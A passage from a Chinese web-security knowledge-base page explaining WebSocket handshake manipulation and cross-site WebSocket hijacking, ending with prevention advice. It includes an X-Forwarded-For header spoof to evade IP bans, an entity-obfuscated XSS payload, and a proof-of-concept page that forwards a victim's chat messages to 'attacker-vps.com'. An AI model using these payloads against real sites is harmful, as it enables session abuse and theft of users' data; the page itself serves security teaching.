</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="二、操控websocket握手流程挖掘漏洞">二、操控WebSocket握手流程挖掘漏洞 <a href="#二、操控websocket握手流程挖掘漏洞" class="header-anchor">#</a></h2> <p>许多WebSockets漏洞只能在握手环节被发现和利用。这些漏洞往往涉及设计缺陷，例如:</p> <ul><li>无条件信任HTTP头，导致某些安全策略可以被绕过。例如：<code>X-Forwarded-For</code>头。</li> <li>会话处理机制存在缺陷，因为处理WebSocket消息的会话上下文通常由握手消息的会话上下文确定。</li> <li>应用程序自定义的HTTP标头引入的攻击面。</li></ul> <p>一个操纵WebSocket握手流程的案例是，当一个在线聊天程序通过WebSocket传输消息时，会过滤WebSocket消息中的XSS载荷，并且封禁攻击者的IP，使该IP短时间内无法再次发起WebSocket连接。此时，可以使用<code>X-Forwarded-For</code>头来绕过黑名单，发起WebSocket握手请求建立连接。</p> <div class="language-http line-numbers-mode"><pre class="language-http"><code><span class="token request-line"><span class="token property">GET</span> /chat HTTP/1.1</span>
<span class="token header-name keyword">Host:</span> normal-website.com
<span class="token header-name keyword">Sec-WebSocket-Version:</span> 13
<span class="token header-name keyword">Sec-WebSocket-Key:</span> lXFKzbFCl/rtB+49awKmcQ==
<span class="token header-name keyword">Connection:</span> Upgrade
<span class="token header-name keyword">Upgrade:</span> websocket
<span class="token header-name keyword">X-Forwarded-for:</span> 127.0.0.1
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p>然后，可以多次绕过黑名单限制，进行XSS Bypass。</p> <div class="language-json line-numbers-mode"><pre class="language-json"><code><span class="token punctuation">{</span><span class="token property">&quot;message&quot;</span><span class="token operator">:</span><span class="token string">&quot;&lt;img src=1 onerror	=&amp;#x00000061;&amp;#x006c;&amp;#x0065;&amp;#x0072;&amp;#x0074;&amp;#x0028;&amp;#x0031;&amp;#x0029;&gt;&quot;</span><span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="三、跨站websockets攻击">三、跨站WebSockets攻击 <a href="#三、跨站websockets攻击" class="header-anchor">#</a></h2> <p>有一种WebSocket攻击类似于JSONP劫持，属于CSRF攻击的一种，它被称为<a href="https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking" target="_blank" rel="noopener noreferrer">cross-site WebSocket hijacking<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a> 攻击。</p> <h3 id="_1、什么是跨站websocket劫持">1、什么是跨站WebSocket劫持？ <a href="#_1、什么是跨站websocket劫持" class="header-anchor">#</a></h3> <p>跨站WebSocket劫持（也称为跨域WebSocket劫持）是一种由于WebSocket握手流程的安全缺陷所导致的跨站点请求伪造（CSRF）漏洞。</p> <p>当WebSocket握手请求仅依靠HTTP cookie进行会话处理并且不包含任何CSRF token或其他不可预测的值时，就会出现这种漏洞。</p> <p>攻击者可以在自己的站点上创建一个恶意网页，从而建立与易受攻击的应用程序的跨站点WebSocket连接。 该应用程序将在受害用户与该应用程序的会话的上下文中处理连接。</p> <p>然后，攻击者的页面可以通过WebSocket连接向服务器发送任意消息，并读取从服务器接收回的消息内容。 这意味着，与常规的CSRF不同，攻击者可以与受攻击的应用程序进行双向交互。</p> <h3 id="_2、跨站websocket劫持的危害">2、跨站WebSocket劫持的危害 <a href="#_2、跨站websocket劫持的危害" class="header-anchor">#</a></h3> <p>一个成功的跨站WebSocket劫持攻击通常会使攻击者能够：</p> <ul><li>伪装成受害者用户来执行未经授权的行为，与常规CSRF一样，攻击者可以将任意消息发送到服务器端应用程序。 如果应用程序使用客户端生成的WebSocket消息执行任何敏感操作，则攻击者可以跨域生成合适的消息并触发这些操作。例如绑定手机号、修改密码等。</li> <li>访问受害者的敏感数据。 与常规CSRF不同，跨站点WebSocket劫持使攻击者可以通过被劫持的WebSocket与易受攻击的应用程序进行双向交互。 如果应用程序使用服务器生成的WebSocket消息将任何敏感数据返回给用户，则攻击者可以拦截这些消息并捕获受害用户的数据。这意味着无需跨域方法的支持(JSONP、CORS)，也可以读取受害者的数据。</li></ul> <h3 id="_3、如何进行一个跨站websocket劫持攻击">3、如何进行一个跨站WebSocket劫持攻击 <a href="#_3、如何进行一个跨站websocket劫持攻击" class="header-anchor">#</a></h3> <p>由于跨站点WebSocket劫持攻击本质上是WebSocket握手上的CSRF漏洞，因此执行攻击的第一步是检查应用程序执行的WebSocket握手过程是否针对CSRF进行了保护。</p> <p>就正常的CSRF攻击流程而言，通常需要找到一个握手消息，该消息仅依赖HTTP cookie进行会话处理，并且在请求参数中不使用任何token或其他不可预测的值。</p> <p>例如，以下WebSocket握手请求可能容易受到CSRF的攻击，因为唯一的session token是在cookie中传输的：</p> <div class="language-http line-numbers-mode"><pre class="language-http"><code><span class="token request-line"><span class="token property">GET</span> /chat HTTP/1.1</span>
<span class="token header-name keyword">Host:</span> normal-website.com
<span class="token header-name keyword">Sec-WebSocket-Version:</span> 13
<span class="token header-name keyword">Sec-WebSocket-Key:</span> wDqumtseNBJdhkihL6PW7w==
<span class="token header-name keyword">Connection:</span> keep-alive, Upgrade
<span class="token header-name keyword">Cookie:</span> session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
<span class="token header-name keyword">Upgrade:</span> websocket
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><blockquote><p>注意:<code>Sec-WebSocket-Key</code> 请求头包含的随机值主要用于防止代理服务器缓存错误，并且不用于身份验证或会话处理目的。</p></blockquote> <p>如果WebSocket握手请求易受CSRF的攻击，则攻击者的网页可以执行跨站点请求，与易受攻击的服务器后端接口建立WebSocket。 攻击中接下来发生的事情完全取决于应用程序的逻辑以及它如何使用WebSockets。 攻击可能涉及：</p> <ul><li>发送WebSocket消息以代表受害用户执行未经授权的操作。</li> <li>发送WebSocket消息以检索敏感数据。</li> <li>有时，可能只需要等待包含敏感数据的消息发送过来。</li></ul> <p>例如，一个跨站WebSocket劫持读取用户聊天记录的POC如下，用户在建立WebSocket连接后，向服务器发送'READY'字符串，即可接收到服务器传来的历史聊天记录。</p> <div class="language-html line-numbers-mode"><pre class="language-html"><code><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>html</span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">&gt;</span></span><span class="token script"><span class="token language-javascript">
<span class="token comment">// Create WebSocket connection.</span>
<span class="token keyword">var</span> ws <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">WebSocket</span><span class="token punctuation">(</span><span class="token string">&quot;wss://vulnerable-site.com/chat&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token comment">// Connection opened</span>
ws<span class="token punctuation">.</span><span class="token function">addEventListener</span><span class="token punctuation">(</span><span class="token string">'open'</span><span class="token punctuation">,</span> <span class="token keyword">function</span> <span class="token punctuation">(</span><span class="token parameter">event</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    ws<span class="token punctuation">.</span><span class="token function">send</span><span class="token punctuation">(</span><span class="token string">'READY'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token comment">// Listen for messages</span>
ws<span class="token punctuation">.</span><span class="token function-variable function">onmessage</span> <span class="token operator">=</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token parameter">event</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token function">fetch</span><span class="token punctuation">(</span><span class="token string">'https://attacker-vps.com/?log'</span><span class="token operator">+</span>event<span class="token punctuation">.</span>data<span class="token punctuation">,</span> <span class="token punctuation">{</span>mode<span class="token operator">:</span> <span class="token string">'no-cors'</span><span class="token punctuation">}</span><span class="token punctuation">)</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>
</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>html</span><span class="token punctuation">&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br></div></div><h1 id="websocket安全问题分析-四-如何预防websocket的安全问题">WebSocket安全问题分析(四)——如何预防WebSocket的安全问题 <a href="#websocket安全问题分析-四-如何预防websocket的安全问题" class="header-anchor">#</a></h1> <ul><li>将通过 WebSocket 接收的数据在两个方向都视为不可信的。在服务器端和客户端安全地处理数据，以防止基于输入的漏洞，如 SQL 注入和跨网站脚本。</li> <li>使用CSRF Token、请求头令牌等方案保护WebSocket握手流程，防止WebSocket握手流程被CSRF攻击所利用。</li> <li>使用<code>wss://</code>协议，（基于TLS的Websockets）</li> <li>硬编码WebSockets的URL接口，以保证用户的输入无法篡改此URL。</li></ul></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/web/mysql-write-shell.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        MySQL写shell
      </a></span> <span class="next"><a href="/knowledge/hw/">
        分类简介
        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/82.7d17e5c8.js" defer></script>
  </body>
</html>